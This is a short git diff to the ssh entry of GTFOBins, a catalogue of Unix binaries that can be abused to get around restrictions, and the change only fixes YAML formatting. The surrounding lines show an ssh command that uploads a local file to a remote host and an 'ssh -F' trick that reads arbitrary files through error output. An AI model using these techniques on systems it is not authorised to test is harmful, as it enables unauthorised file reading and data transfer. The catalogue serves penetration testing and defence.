diff --git a/_gtfobins/ssh.md b/_gtfobins/ssh.md index 9b2fe66..93912f3 100644 --- a/_gtfobins/ssh.md +++ b/_gtfobins/ssh.md @@ -19,7 +19,7 @@ functions: ssh $HOST "cat > $RPATH" < $LPATH file-read: - description: Read lines from text files (error-based approach). - - code: | + code: | LFILE=file_to_read ssh -F $LFILE localhost ---